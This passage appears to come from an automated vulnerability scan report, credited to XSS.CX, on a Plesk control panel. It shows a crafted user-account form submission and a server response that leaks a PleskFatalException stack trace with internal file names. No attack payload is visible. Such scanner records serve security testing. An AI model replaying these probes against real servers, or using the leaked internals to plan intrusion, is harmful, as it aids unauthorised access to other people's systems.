general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296

Report generated by XSS.CX at Tue May 24 05:40:53 CDT 2011.